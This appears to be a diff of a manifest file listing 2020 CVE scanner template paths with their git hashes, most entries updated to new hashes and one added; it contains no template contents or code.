-http/cves/2020/CVE-2020-17362.yaml:22f451d6954491562738282cd5c54abd3e2d6950 -http/cves/2020/CVE-2020-17453.yaml:604b40d94dacd18f1096b0630d8846e78561aeec -http/cves/2020/CVE-2020-17456.yaml:32c3be57adf931b97a0390efb6a6d65094c9b471 -http/cves/2020/CVE-2020-17463.yaml:0fd98af252d84981af50385306a4a64fbb3e6e39 +http/cves/2020/CVE-2020-16952.yaml:854c11a76ada49a0abfce2378cbcf02b51a6f9cf +http/cves/2020/CVE-2020-17362.yaml:0e502b8f2952121533a44aff63b92b4db38ef7b4 +http/cves/2020/CVE-2020-17453.yaml:a14b2a9ed3169ac0b0ace8c79c7ea20af4fd3590 +http/cves/2020/CVE-2020-17456.yaml:7142644c5959758fc3867e7c0afe2ed9874e7944 +http/cves/2020/CVE-2020-17463.yaml:0f45b028b714c60436464d1fdef8869786855171 http/cves/2020/CVE-2020-17496.yaml:dc34c9df5ec51a26289c176e26be035dc37b6a40 -http/cves/2020/CVE-2020-17505.yaml:d5bf6110422e3c634cf5769a4f30e4b523711070 -http/cves/2020/CVE-2020-17506.yaml:445d90a0873bb3f6791534850cbf0cd2add55249 -http/cves/2020/CVE-2020-17518.yaml:a4ba71ee304d939d93662542ae08128f98df5d83 +http/cves/2020/CVE-2020-17505.yaml:e4a72fc4391e1ad4f179450107e7b6d335e8ef6a +http/cves/2020/CVE-2020-17506.yaml:2d618940b7758cb1490dd78df0b98729260ae8be +http/cves/2020/CVE-2020-17518.yaml:4b68702482a2c19293db43bc67d94256b1537962 http/cves/2020/CVE-2020-17519.yaml:c046016078374c126b13e98b33d8df42d80442ce -http/cves/2020/CVE-2020-17526.yaml:232378d7956b48c05bdd0609ff1f8559d2406281 -http/cves/2020/CVE-2020-17530.yaml:d3130c9e68e50305153b46a5bb50cc2dfca57d5b -http/cves/2020/CVE-2020-18268.yaml:36a0e099e8e190b60b051f0289c0b360c2c62366 -http/cves/2020/CVE-2020-19282.yaml:522df5c4a86f6b26b64892c76aee97c51d65fb13 -http/cves/2020/CVE-2020-19283.yaml:bf6eef278feda2949ff85a8495de3b7afe4d4be4 -http/cves/2020/CVE-2020-19295.yaml:f5a6ddd692a3ab0cd955ed0bb8d8dd23c3ae9ad7 -http/cves/2020/CVE-2020-19360.yaml:71d482d016e92c0daf60cac8e1496845a3c969fe +http/cves/2020/CVE-2020-17526.yaml:59653998be18d2d370bd3c60ac61df1675876847 +http/cves/2020/CVE-2020-17530.yaml:99565ad00ffa10037ce9657e0b9c364ba64fbb04 +http/cves/2020/CVE-2020-18268.yaml:504c8e2c07d00dbb694415b655688188f3772461 +http/cves/2020/CVE-2020-19282.yaml:3311b62bb830c9cf5364c02cbead8692d38ab82d +http/cves/2020/CVE-2020-19283.yaml:49b8f16862ebed5bf0003b8cdd8272dc1cf7c9f7 +http/cves/2020/CVE-2020-19295.yaml:e76a39287954876fe0a22f82b844a83f6efc10f5 +http/cves/2020/CVE-2020-19360.yaml:8222b994f7c3a0368f72cff1d7ad9c9e167bea54 http/cves/2020/CVE-2020-1943.yaml:e5519635e10fa69f665cea2ed4fbc58d43d2fce9 -http/cves/2020/CVE-2020-19515.yaml:b77f42d88962da2779318d99c3817f22720452e2 -http/cves/2020/CVE-2020-1956.yaml:fa51411b3489f00eac9485d03e92f1b9f89f4913 -http/cves/2020/CVE-2020-19625.yaml:2962f8a0c16876a9c04edabdab54199ed0209768 -http/cves/2020/CVE-2020-20285.yaml:5d1ffc59d09631fa682fb61ff0737e693ce341bc -http/cves/2020/CVE-2020-20300.yaml:73508edea0c60e5b422fc2a2409498c4d1bce531 -http/cves/2020/CVE-2020-2036.yaml:68e1a0b355b0f8483b367f10aa3ab6ee1edd3c67 +http/cves/2020/CVE-2020-19515.yaml:90f1c1aad9dfe62e30e05284326a6a8117779268 +http/cves/2020/CVE-2020-1956.yaml:43ae9ae431eb35e1b44b8d08dfe4ef9777890301 +http/cves/2020/CVE-2020-19625.yaml:bfb13a91a1f59eb35204a6a7b4cdb10ba3f9bc75 +http/cves/2020/CVE-2020-20285.yaml:9aaccce5fc5d7a2bcb2c564461eb7cff0c4f9093 +http/cves/2020/CVE-2020-20300.yaml:e6d7c4d451489e995b13722677c5a087176518f6 +http/cves/2020/CVE-2020-2036.yaml:b80d29e1131b03b8bd1b9baffc702b23adc374a0 http/cves/2020/CVE-2020-2096.yaml:b8ce7607c4994bf5d834a3ae59643f91e56e94bb -http/cves/2020/CVE-2020-20982.yaml:0c7403375c26ce8d760062d57d6f9a14e1b72134 -http/cves/2020/CVE-2020-20988.yaml:7280080e10e1f4ff85ccec1028fa0399647ec2e8 -http/cves/2020/CVE-2020-21012.yaml:dfdcc1fbcefd2604f34ff067b888323ed37dda32 -http/cves/2020/CVE-2020-2103.yaml:bf0c52e121f7863d6200580ed96a88ebdcff2ac2 -http/cves/2020/CVE-2020-21224.yaml:fb3f6115f60234f0cff933ade4deb08ac1bd3a39 -http/cves/2020/CVE-2020-2140.yaml:33ec9c8229173ba5d3b2bd5c0975b2d1408c6eb8 -http/cves/2020/CVE-2020-22208.yaml:ec758d53dc9e8182f9fbb46510542b6e0b89fa2c -http/cves/2020/CVE-2020-22209.yaml:66c1cdf3208aa192d47c90ea3924742dfb91b8fa -http/cves/2020/CVE-2020-22210.yaml:fc87f75c83245a5e94476fab07fd5af85ed24f13 -http/cves/2020/CVE-2020-22211.yaml:156d5e9de477879bdc3ecf72afd98bc74ee6fc64 -http/cves/2020/CVE-2020-22840.yaml:ed6427f61b5d16a2168298f508d089319a61edd9 -http/cves/2020/CVE-2020-23015.yaml:daac71deaed161a163ab86b2fd9c0a4fccb8bf5f -http/cves/2020/CVE-2020-23517.yaml:5f57d4cf0c75721c7cd8737cc5b95d8b04c4d848 -http/cves/2020/CVE-2020-23575.yaml:bf9e76b07dc2e541aa719078c385335653adf88d -http/cves/2020/CVE-2020-23697.yaml:56db8a2e294b22d878e3ccc64b885032eb613fa9 -http/cves/2020/CVE-2020-23972.yaml:2dc485442907753f4ca4e6e64cab5a5c606a21d8 -http/cves/2020/CVE-2020-24148.yaml:ef91b581ce399c2f01bb3e30cfbba943bf172be7 +http/cves/2020/CVE-2020-20982.yaml:c30acc718c6c02a8f81491a01b5a617da03dcacd +http/cves/2020/CVE-2020-20988.yaml:bbfe91935c4cb18cb28b36fc7b70c44804f415b2 +http/cves/2020/CVE-2020-21012.yaml:d3cfd90f38a4a0346fbc941e17d23d58cde64c14 +http/cves/2020/CVE-2020-2103.yaml:5c89179215e9d8333093eeb463f418897f5c7ccf +http/cves/2020/CVE-2020-21224.yaml:7b5911a6ddad770b2cde14d3889801cbeb97a93d +http/cves/2020/CVE-2020-2140.yaml:76da9674f05fe12f6063e1ab65f8921ca489c2bb +http/cves/2020/CVE-2020-22208.yaml:4eeed57574226a7a9616a350c2780ff26ea87836 +http/cves/2020/CVE-2020-22209.yaml:7b30ff4f556bdb3b5c2519ad89380853c759e64c +http/cves/2020/CVE-2020-22210.yaml:daff6fe8aa0c07a7629b5150e74dfe2050a3db14 +http/cves/2020/CVE-2020-22211.yaml:baf94758c05f4729526315c8b119417b2b594c48 +http/cves/2020/CVE-2020-22840.yaml:c8a3c6463a7bda5a1eb2f203ba18992c9229fa2a +http/cves/2020/CVE-2020-23015.yaml:cde7e01aeb236d328e97564a3e013b26dff8cb60 +http/cves/2020/CVE-2020-23517.yaml:144868fe30c240d9cb57a4642a836e8112d3c523 +http/cves/2020/CVE-2020-23575.yaml:8a4d405f20856483059894d6f975c03a50ae428a +http/cves/2020/CVE-2020-23697.yaml:952a183bd1ae83d74188c899dfcb038519d59df4 +http/cves/2020/CVE-2020-23972.yaml:2049c1139d7ebac54ab0c2b6c4a266dd2b6a31bb +http/cves/2020/CVE-2020-24148.yaml:af467d447581927b0255063ba359fbf4466e2956 http/cves/2020/CVE-2020-24186.yaml:e041f962dc31a09de8b8cf87865899adaa59a3cb -http/cves/2020/CVE-2020-24223.yaml:4ba53fd669e82e3c9d90807f711089d752c05122 -http/cves/2020/CVE-2020-24312.yaml:1d91d919384661d1b9740d706e8b014df5878b3d -http/cves/2020/CVE-2020-24391.yaml:c0435983509381b04485818d5031536dc0c926c0 -http/cves/2020/CVE-2020-24550.yaml:8b53eca335475206152ecd2df4c7bd79cfbc50c0 -http/cves/2020/CVE-2020-24571.yaml:78b17607cf4b935a1d1dae4b09148817776944a3 -http/cves/2020/CVE-2020-24579.yaml:b67ba4580a3fff9bea1f7d22f32bf6ce6739d574 -http/cves/2020/CVE-2020-24589.yaml:785fc35bb33b0da091012fdad9ae8ba836cea0b9 -http/cves/2020/CVE-2020-24902.yaml:8d2ff4eba00fb46c1ff1f658e321b15204f6ea65 -http/cves/2020/CVE-2020-24903.yaml:c9ffae22fda0812fcdec1948dd002098766b17b8 -http/cves/2020/CVE-2020-24912.yaml:0c1c71007e6e6125869a50f47527a7b33ba4be74 +http/cves/2020/CVE-2020-24223.yaml:9c1c1b2138b8caeb345c7b132005265188e784b8 +http/cves/2020/CVE-2020-24312.yaml:1fd3b937839be8bb20de6aa545167985e681e7a9 +http/cves/2020/CVE-2020-24391.yaml:883834f2ab14d3c99cda8d7c5cd566d7ae9f67fb +http/cves/2020/CVE-2020-24550.yaml:8132c0821ec844e37fa5e53b41a8d1f24a6eb1bb +http/cves/2020/CVE-2020-24571.yaml:d3b897c1d34534a6a7aa2b58417da9c65b34f951 +http/cves/2020/CVE-2020-24579.yaml:54c8e393d9b9d4909905c0145d3e2065ae4a3c3d +http/cves/2020/CVE-2020-24589.yaml:895056aba48d171fb807fbe1e485fa89fbfe6003 +http/cves/2020/CVE-2020-24902.yaml:01ceafc3f0af1b74607cd6deae56426680cc23e7 +http/cves/2020/CVE-2020-24903.yaml:6abeb46fffae65b9a25900a0fc7f60ea4f84de4a +http/cves/2020/CVE-2020-24912.yaml:eabdc22c58d0318a74f3e058e3c6a32f37e65870 http/cves/2020/CVE-2020-24949.yaml:bb1edd259c53a7ecde312b22a57cf92643170fc2 -http/cves/2020/CVE-2020-25078.yaml:e488558f8679098459bbf08ac28e975d80056c2f -http/cves/2020/CVE-2020-25213.yaml:874c3b65dd4f5ac18309ddd97076a7ae1a72b961 +http/cves/2020/CVE-2020-25078.yaml:1466cb6a6de786fccca1ef350ae8040b6f8b3db7 +http/cves/2020/CVE-2020-25213.yaml:0d9e74056ab69f6db0ad8f542791d6cdd4cafbcf http/cves/2020/CVE-2020-25223.yaml:d99eb728c56a70fbda5d81e87a6da50d29bd4d3c -http/cves/2020/CVE-2020-25495.yaml:d990948460e987935feb98f58fdc5266e417b0f8 +http/cves/2020/CVE-2020-25495.yaml:fb5e783f79fc226a386847e162f95cfb95cc6cfc http/cves/2020/CVE-2020-25506.yaml:330ccaade80db6feb99c51b9e5794332c7e06236 http/cves/2020/CVE-2020-2551.yaml:c810a2e2d026f58b1982ce0506a2982214fb5247 -http/cves/2020/CVE-2020-25540.yaml:d7b11fca1f54a2ea682011aeceb6251f36b48df7 -http/cves/2020/CVE-2020-25780.yaml:adbc68a8d485c1a0dfa2e886d4cfbd602713d607 -http/cves/2020/CVE-2020-25864.yaml:4976dcda287ca6593162a58b190a3ba9404a6cdf +http/cves/2020/CVE-2020-25540.yaml:68a2eb884b8e3f522a55b5034a8b44edc51809dc +http/cves/2020/CVE-2020-25780.yaml:4ead5ec585f1d8e941bd10b95f9f243a9343c37a +http/cves/2020/CVE-2020-25864.yaml:636581ee57231156e913fa875e79d2a0d32ad480 http/cves/2020/CVE-2020-26073.yaml:c2480acfdbe2cb79eb9677736948078368b67f54 -http/cves/2020/CVE-2020-26153.yaml:617d3f7b61dc3ea9b6f553bc6c8fd03579892bda -http/cves/2020/CVE-2020-26214.yaml:7e9f81f9ea1e3a945dfc82f071ce244a74e3371a +http/cves/2020/CVE-2020-26153.yaml:cb7833fabf1f36adb87b04ff9ac3e1f277dc23bc +http/cves/2020/CVE-2020-26214.yaml:cb5d0ddd2791bd4ea3102a36f667463d314147e6 http/cves/2020/CVE-2020-26217.yaml:bfc01bf7d9a86f439c6f00153d209c145bcf864d -http/cves/2020/CVE-2020-26248.yaml:c58fcc299a7fdc9479fe82dcd2d4c424ebd23a58 +http/cves/2020/CVE-2020-26248.yaml:e4afa9ff6a8844481b87153b06ed1421f93524ac http/cves/2020/CVE-2020-26258.yaml:4ab18177159095e4762c60c8792db8d7541fad9d -http/cves/2020/CVE-2020-26413.yaml:3dde60dd9c8f6c69d333dc2af95a4e411c956da6 -http/cves/2020/CVE-2020-26876.yaml:be9578dc51bb51b5966fcc5aca2413f8c9db928b -http/cves/2020/CVE-2020-26919.yaml:bb9ff9626d694890eec2b3d39e75eab4d6f70ebe -http/cves/2020/CVE-2020-26948.yaml:3856bb3fcea72c2a7b1d12f4fe0d99387cc35c1b -http/cves/2020/CVE-2020-27191.yaml:054b18e21420d326307e152e87d5bbf370a2f48b -http/cves/2020/CVE-2020-2733.yaml:b79a2c36595108819467e72dfce7cb4a7b4b0153 -http/cves/2020/CVE-2020-27361.yaml:53abf07ed1070cb5b596d047fe6aff8c779d5ba7 -http/cves/2020/CVE-2020-27467.yaml:f52257a27923cade2b13c1eac21267cfd28c3807 -http/cves/2020/CVE-2020-27481.yaml:ed4e9910d41815c06d2d800b0152c36dc65ea083 -http/cves/2020/CVE-2020-27735.yaml:f5b6a42a493ec6a6f28831a296733801fffbf846 -http/cves/2020/CVE-2020-27866.yaml:ed63a1f7806bf2e7ee90c22ffa7d2c9c33bb3656 -http/cves/2020/CVE-2020-27982.yaml:d8ff7a534285903706d72d1f990372d2b09b72e8 -http/cves/2020/CVE-2020-27986.yaml:e433bb72654f619136bcea90b95ff4e13cd3c46d -http/cves/2020/CVE-2020-28185.yaml:d5e03ab2ec21263fde9659dff854f7764ae09804 +http/cves/2020/CVE-2020-26413.yaml:ced45b7e5a6f3fce6af46f4989111c7a314d3fb6 +http/cves/2020/CVE-2020-26876.yaml:651ed46d3cb316ce0b05f748142093d4f9f81fa3 +http/cves/2020/CVE-2020-26919.yaml:6295bf36a4d4c86f1d2c6da3e3c6e5933d4c454f +http/cves/2020/CVE-2020-26948.yaml:1df46ee342e50ccfa94b23f7031bf0f74653c035 +http/cves/2020/CVE-2020-27191.yaml:763a08fa3dc31eb78bd484a0c60a46de85d51b02 +http/cves/2020/CVE-2020-2733.yaml:91fc43174e18d075bde17e193449042ec7b7a672 +http/cves/2020/CVE-2020-27361.yaml:781ff6e1b43d3e1b9fd192be245a32e209352ad8 +http/cves/2020/CVE-2020-27467.yaml:5fc9290d7d2aa1e8ef9b1945ee26b7fa0484b409 +http/cves/2020/CVE-2020-27481.yaml:c1bd329f6d47397f7b3c95f1a31f10db1e9c7152 +http/cves/2020/CVE-2020-27735.yaml:ace2c10f98f8f4ed1346c0640afb89bb4f3e3905 +http/cves/2020/CVE-2020-27866.yaml:299079d9f743bf36f3628736dde34754535cce2f +http/cves/2020/CVE-2020-27982.yaml:4a9b51721cf4462c3f9cf62f895112a565addb19 +http/cves/2020/CVE-2020-27986.yaml:b39a1bd5ada90b86ffae6f5a9ec7a344af1092e3 +http/cves/2020/CVE-2020-28185.yaml:27b6a0501a2c2864adb18a5e8642c4b22d0feeeb http/cves/2020/CVE-2020-28188.yaml:5e8e013b799caa85226fbc26cf351da22e128bdd -http/cves/2020/CVE-2020-28208.yaml:2a03eceb0673f3a63960943e45d63f09d1537752 -http/cves/2020/CVE-2020-28351.yaml:acd1d0c6663483ae8e345f79ef39570bbcdf13a9 +http/cves/2020/CVE-2020-28208.yaml:e126ea88cec8ac9d82add1356f72bd860c7e0628 +http/cves/2020/CVE-2020-28351.yaml:7b2915d708f17a302d2911faad02b1379a4955d8 http/cves/2020/CVE-2020-28871.yaml:4d0ed6db359e4f3bff1e2279960e784c0c657780 -http/cves/2020/CVE-2020-28976.yaml:bbc3939e90db13cb2216c79b7837642f03cf0599 -http/cves/2020/CVE-2020-29164.yaml:2c2f63083107a1fe0a9a6eb09f347f923e555266 -http/cves/2020/CVE-2020-29227.yaml:6529003b57832916d74247e1838b285290ee4379 -http/cves/2020/CVE-2020-29284.yaml:f88cb64588fdae8bd8aa5c1ea94a6c0de45ec190 -http/cves/2020/CVE-2020-29395.yaml:78bc21208d4f31ea60e4ba7e6813254164567814 -http/cves/2020/CVE-2020-29453.yaml:cdd7d1ccd1fcc237fbb2954161f6bf64d368f925 +http/cves/2020/CVE-2020-28976.yaml:18f51eed88f2e706bd98b83bd962589eb9a1bf2f +http/cves/2020/CVE-2020-29164.yaml:8311691d2f46cb70616e35d804924fd5e8c8d2c1 +http/cves/2020/CVE-2020-29227.yaml:14cf4717292c67661074e81243c20fffaf0933a5 +http/cves/2020/CVE-2020-29284.yaml:35da04899a9398f9ab4584631d1110340ec24d8d +http/cves/2020/CVE-2020-29395.yaml:3ed07f8312567c8a563a11258aeff0d1b35593cd +http/cves/2020/CVE-2020-29453.yaml:9adb6d4835888cf42080357dfbe3e0fa2993f1a9 http/cves/2020/CVE-2020-29583.yaml:8f8c2e2a7918d035abf99677b8adcb360d1fc5cf -http/cves/2020/CVE-2020-29597.yaml:18aa119ac41d89481a0fbe7068480044b256d9a1 +http/cves/2020/CVE-2020-29597.yaml:4bf45cb14e3f8d4c667fb32075050ca4628bdf8f http/cves/2020/CVE-2020-3187.yaml:5da31b4fe1070f9e03ba7fb2ffd481217ebfdb9b -http/cves/2020/CVE-2020-3452.yaml:cd9bfb40aac23958612015be52b638b0cbccf11b -http/cves/2020/CVE-2020-35234.yaml:2c0e9e540a754769d7d4fac20dfa1ed34d3c5d12 -http/cves/2020/CVE-2020-35338.yaml:adf2dcc53f83c31e3d6a035af48e8e85e75e967b -http/cves/2020/CVE-2020-35476.yaml:007923ae114698d6fd19bd1e2284190970de8cf0 -http/cves/2020/CVE-2020-35489.yaml:7440dcf076dd095d8978ef3501eabc80d521ba4a -http/cves/2020/CVE-2020-35580.yaml:fdfd222dba259689cdea9768d46e956b946ca1e3 -http/cves/2020/CVE-2020-35598.yaml:e7de4b475da41d953dbca7d47cc43cd51e8e889e -http/cves/2020/CVE-2020-35713.yaml:b7ece46442306d4dc7336f7fcf2188ed7d8664ad -http/cves/2020/CVE-2020-35729.yaml:6525abe92b51c2ed276dd4dd35eac0ecb74319a6 -http/cves/2020/CVE-2020-35736.yaml:12ee3d27228399130f2f18c46a526dd43de67e1c -http/cves/2020/CVE-2020-35749.yaml:a23b8a0ba8e5597c855d2628b282d291b657da46 -http/cves/2020/CVE-2020-35774.yaml:09ea32b2ab88dc315f7d28eb215eaf3a8208dd1f -http/cves/2020/CVE-2020-3580.yaml:153243caf6337dc5cd4d5df1c74e6927940a9d09 -http/cves/2020/CVE-2020-35846.yaml:c7f73f5fecf13c7679184cbf784ab1f4248c203e -http/cves/2020/CVE-2020-35847.yaml:73be2eedc2a1000af3e6dc8bc1758bc13b5b13eb -http/cves/2020/CVE-2020-35848.yaml:0c7981acedd8d777e1957fe1adc8b71d21b02dde -http/cves/2020/CVE-2020-35951.yaml:1043c022a1e34dab5004b159ead15916ca4d0374 -http/cves/2020/CVE-2020-35984.yaml:f9f3df6c5722657d417912800f77cf4445426096 -http/cves/2020/CVE-2020-35985.yaml:a0fe84254b01d7b81e03678e8377f68f641f4f9e -http/cves/2020/CVE-2020-35986.yaml:9247ad22ca2d4f23d1e33d246d22fb0147895342 -http/cves/2020/CVE-2020-35987.yaml:b744cc77435d6a3873e44e59621c1f4e6ea1deaf -http/cves/2020/CVE-2020-36112.yaml:b0500b3f46f5fac7664153a0e9402570df0552da -http/cves/2020/CVE-2020-36289.yaml:d32ca222e6f545522cccdfe6e820f1d17758d452 -http/cves/2020/CVE-2020-36365.yaml:948f9876d6382b6077458c93aa1cd787922e33a5 -http/cves/2020/CVE-2020-36510.yaml:15e0246c5a6f70daecefca88999630ade310a34e -http/cves/2020/CVE-2020-4463.yaml:219cd5e93ac5860cfb1d5a1cedb914b53ed8b204 -http/cves/2020/CVE-2020-5191.yaml:5e87f7683fba75e9e6af988715f719404bc8bb76 -http/cves/2020/CVE-2020-5192.yaml:9daf92e8a3b7145c386e10bebb145eba4f5ed9b2 -http/cves/2020/CVE-2020-5284.yaml:8ba8d7216e7e233d40c07e16c7be6f4d339d967e -http/cves/2020/CVE-2020-5307.yaml:4dad56dd32195af841f91e4516942897c84fdc74 -http/cves/2020/CVE-2020-5405.yaml:01fd8282e747c8d1274709dfc27a1f896a5ec033 -http/cves/2020/CVE-2020-5410.yaml:7424a3da686a0e889bce5f1196cca69acbae05b4 -http/cves/2020/CVE-2020-5412.yaml:fe41f59bcd1d40dcbb68d9226ac474687d13207f -http/cves/2020/CVE-2020-5775.yaml:f0004eeaf83658cfb368622b29e3e8b06edbf853 -http/cves/2020/CVE-2020-5776.yaml:5e814fe92e88a12ca4d09dfe03fd6c5899e1f0e6 -http/cves/2020/CVE-2020-5777.yaml:3d3666b99eae64af2e55b8306c61eb7e1993ea7c +http/cves/2020/CVE-2020-3452.yaml:85be4162c6622315f7d983c2dc170790159b23d6 +http/cves/2020/CVE-2020-35234.yaml:3ee1f761481d979f9ba406020369847f32d326c0 +http/cves/2020/CVE-2020-35338.yaml:f35f6ca3d682328c38a0624d3ebc2bd4ef8b118f +http/cves/2020/CVE-2020-35476.yaml:7fa16ee649fc5b2127498037a70f7572a04825b1 +http/cves/2020/CVE-2020-35489.yaml:1de0f175b60c8b841a34ee84fba17de614d24e0a +http/cves/2020/CVE-2020-35580.yaml:2941b958e327dcdbb8bd2ce075a94d46d2050c19 +http/cves/2020/CVE-2020-35598.yaml:6392bd1d8e38efade51b7c917a033f1df7d0f5ac +http/cves/2020/CVE-2020-35713.yaml:92b8ee49089e0fd92bfd208eeacd188d4dd8be73 +http/cves/2020/CVE-2020-35729.yaml:c5fe426a5672b65b7d6b3a3023f1979d950c53b7 +http/cves/2020/CVE-2020-35736.yaml:c2f9ea35464f4e9343c1ee10a270d011ae5be0c1 +http/cves/2020/CVE-2020-35749.yaml:0a7c5fa5ebcb4834859a4478515ed9074c402c55 +http/cves/2020/CVE-2020-35774.yaml:7632f1d2634c885b77a39a31875d6f5109fb28ee +http/cves/2020/CVE-2020-3580.yaml:1a94da10350b17b548c855dec9be491dc2980a28 +http/cves/2020/CVE-2020-35846.yaml:3b1791b3deaa3b953fe86d3cd54836cb0b888df6 +http/cves/2020/CVE-2020-35847.yaml:b971e5aa204851ea867abbb38f563cc7d474c4d4 +http/cves/2020/CVE-2020-35848.yaml:625d3a8e5b3bc2bfaa0ee3c2304f3466965ba09a +http/cves/2020/CVE-2020-35951.yaml:a251e9b5a16ffabbd245fbd36adef1f794f0659b +http/cves/2020/CVE-2020-35984.yaml:b48c3c4d96ecbb9636c8b27d11b40dd9f45ec6bb +http/cves/2020/CVE-2020-35985.yaml:65c371391d0b444278472c69b5a7c776ce5504ec +http/cves/2020/CVE-2020-35986.yaml:0f84e88522d906ca42a3d201d39b16e3b0e60759 +http/cves/2020/CVE-2020-35987.yaml:a8bf01eefd7c55d073c0cb66563ce9a128c9eeea +http/cves/2020/CVE-2020-36112.yaml:5c70440c14b0711f22e494609208c75f7c2246c4 +http/cves/2020/CVE-2020-36289.yaml:2705e3a3509fcf9686055fcdc842142a7f6ab60c +http/cves/2020/CVE-2020-36365.yaml:da684466870c9e3c7e719aa2fc43aa06476e5a01 +http/cves/2020/CVE-2020-36510.yaml:feb531d7da9e05af7f1dcfcc7acca4eb077b016f +http/cves/2020/CVE-2020-4463.yaml:749e8b381c971aac5e416b19e2a9b6fea830b695 +http/cves/2020/CVE-2020-5191.yaml:2679ade8b7d857b23577ceb98a282ed238ebc77d +http/cves/2020/CVE-2020-5192.yaml:129a03282a2a9a146065c234ae3e68482d6b3b56 +http/cves/2020/CVE-2020-5284.yaml:e78e2d9f62cbf5169b88803dc4c3242d263b4e93 +http/cves/2020/CVE-2020-5307.yaml:2a4d76250626ede0535bb76ce0bae70025b92545 +http/cves/2020/CVE-2020-5405.yaml:ce7ff3c726cec47ffd5a8bff3eebb07446d6d23e +http/cves/2020/CVE-2020-5410.yaml:796fbaca41c42006a25589dd92f5c4f376381cfa +http/cves/2020/CVE-2020-5412.yaml:dad587910e2a8bdc0e88ed108965717e29f8f2c1 +http/cves/2020/CVE-2020-5775.yaml:58ad9b58762c02e2016f7b7b79880cd5d951de70 +http/cves/2020/CVE-2020-5776.yaml:3153f640ab2ca16a5e4daa05c1e902ed65a07923 +http/cves/2020/CVE-2020-5777.yaml:e7716194c740a0f75ca3ce9b584bde30dfd3a94f http/cves/2020/CVE-2020-5847.yaml:f6517fd3307e79f7772e71cc0a1714e9b7fd8ee2 http/cves/2020/CVE-2020-5902.yaml:55dfd65e105c5ee30a15fc7a1704a47ee477c03c -http/cves/2020/CVE-2020-6171.yaml:767a820b18fa7e51a293a2dc2d5cc77aaaf5f804 +http/cves/2020/CVE-2020-6171.yaml:986317049fd6dd774c80af585d9a0570e385f34a http/cves/2020/CVE-2020-6207.yaml:90048b46a177dc0685fab8f625c33160de6f2ec4 http/cves/2020/CVE-2020-6287.yaml:432e7d384e17ed96a4c25b09f87c25340da8a551 -http/cves/2020/CVE-2020-6308.yaml:df61efde7133cbfbee230e7fb19e9bbb918fcb31 -http/cves/2020/CVE-2020-6637.yaml:97112d4a74e5f1e13bb1f7098f8c8da930efc576 -http/cves/2020/CVE-2020-6950.yaml:e70ad9110f4ccb412408b78a6a2910cee4c589fb -http/cves/2020/CVE-2020-7107.yaml:56b58fe918b9599a0db9320cf2130ea218e76121 -http/cves/2020/CVE-2020-7136.yaml:1743b7f11868429f72d8a6797214682c13f1a2f6 +http/cves/2020/CVE-2020-6308.yaml:8a209f558836c8b6ac84c22aa6a1212b044fd02a +http/cves/2020/CVE-2020-6637.yaml:4a9adf26681c927e7dd1e8202d7d1d82ea99a621 +http/cves/2020/CVE-2020-6950.yaml:76b223800827befcdcc57aae71e0833463f9fd33 +http/cves/2020/CVE-2020-7107.yaml:f322024d224c3ec82c56a3cd1db979bbe1b6dc76 +http/cves/2020/CVE-2020-7136.yaml:3bdc17d2e65685f98ffd6aa60ffb6992ed0cc6dd http/cves/2020/CVE-2020-7209.yaml:75abfd4eed3a2dac2dbaecfed1e881a5378d043d -http/cves/2020/CVE-2020-7318.yaml:08b6a13dae0347baa3f646593b62ec3d13c7b738 -http/cves/2020/CVE-2020-7796.yaml:6d699fbfca3ada4b865c36a5c456445c8fcb34aa -http/cves/2020/CVE-2020-7943.yaml:a502f486e7d3f18ed30024b91d85cbb953c918f8 -http/cves/2020/CVE-2020-7961.yaml:2cda8accc075596872d4f9013681cbbb8388a5d8 +http/cves/2020/CVE-2020-7318.yaml:ef017832010d5311b6729a849995b713849950c6 +http/cves/2020/CVE-2020-7796.yaml:5ee1580d4acdd6a35030d559eee97a659398567a +http/cves/2020/CVE-2020-7943.yaml:bc471606fc8e2af0acaeba7fba01963e5aaa8154 +http/cves/2020/CVE-2020-7961.yaml:929f407fed21eb19edaecb472fd9bd46dd3c714e http/cves/2020/CVE-2020-7980.yaml:db41b6df4404948164e9057a667f3c6b86b5810e -http/cves/2020/CVE-2020-8115.yaml:a2079ddad395eada91bcb6e08242ef0c409a89f2 +http/cves/2020/CVE-2020-8115.yaml:ec37ff3961bf836702f2861b85c878a3321426f4 http/cves/2020/CVE-2020-8163.yaml:fd06402612e0679def10db9d1d9de33ba97352b0 -http/cves/2020/CVE-2020-8191.yaml:acfc74063f4453971eacee53a90d9905ec965fd3 +http/cves/2020/CVE-2020-8191.yaml:46063afe73a6069bf39d9dd901f7a36c19cb0acb http/cves/2020/CVE-2020-8193.yaml:d943b6d960a876b558ba6a6101876fd03778037c http/cves/2020/CVE-2020-8194.yaml:5755e26bca7f961aa3ad66567cad98b715c9b5b6 -http/cves/2020/CVE-2020-8209.yaml:6f47826f91e55194b75213c6dd45d78b44116c91 -http/cves/2020/CVE-2020-8497.yaml:ccb624f405dc2229ca72de72356be43f3d2b1d5a -http/cves/2020/CVE-2020-8512.yaml:ceb855a8b22f063c447b644777d18914ab6e2f2b -http/cves/2020/CVE-2020-8515.yaml:317d3fd732e352f539445654f76096578927df5d -http/cves/2020/CVE-2020-8615.yaml:adcda9d8cb00e720fcc44086e34c5a8b327aa577 -http/cves/2020/CVE-2020-8641.yaml:dc000f3a093e17306c4700b532891b7466dccb7a +http/cves/2020/CVE-2020-8209.yaml:b534217c13f335fb356334b5d0c6acb42159e2e5 +http/cves/2020/CVE-2020-8497.yaml:96237343b113bdf1decf5f32b5b86ac71b9d38ac +http/cves/2020/CVE-2020-8512.yaml:df8b4132bb758d04f27c5fe0e26efc6ab091a897 +http/cves/2020/CVE-2020-8515.yaml:f0f8ddad2ce3137e1936a7e14c22ade79504abee +http/cves/2020/CVE-2020-8615.yaml:1accbbf1490fd0d732aad1f9eea4d756e44c3e32 +http/cves/2020/CVE-2020-8641.yaml:2b6e7b4e5cf4748c2f101b78664e7d52c44b3c98 http/cves/2020/CVE-2020-8644.yaml:94631139f37ca4be3871341f6a413703c61c4f23 -http/cves/2020/CVE-2020-8654.yaml:d5f9f3ec2418b2c10a7055e6c9d1219b94e6d069 -http/cves/2020/CVE-2020-8771.yaml:79ca9cc16e65525abd0089814e91b31d7ce00440 -http/cves/2020/CVE-2020-8772.yaml:ec26e6c843da63504906e16932525ed68507cda0 -http/cves/2020/CVE-2020-8813.yaml:8101c0e09ba977070def599eca73c3df048f182c -http/cves/2020/CVE-2020-8982.yaml:8a1126dfe7c1fa356be9f8e83fab1bdafcf66703 -http/cves/2020/CVE-2020-9036.yaml:dc4ec1cd23d19cde9eb8e371d2a510202e2469b8 -http/cves/2020/CVE-2020-9043.yaml:39025070b23bcdf22a2b916ce6195bc2d38017c1 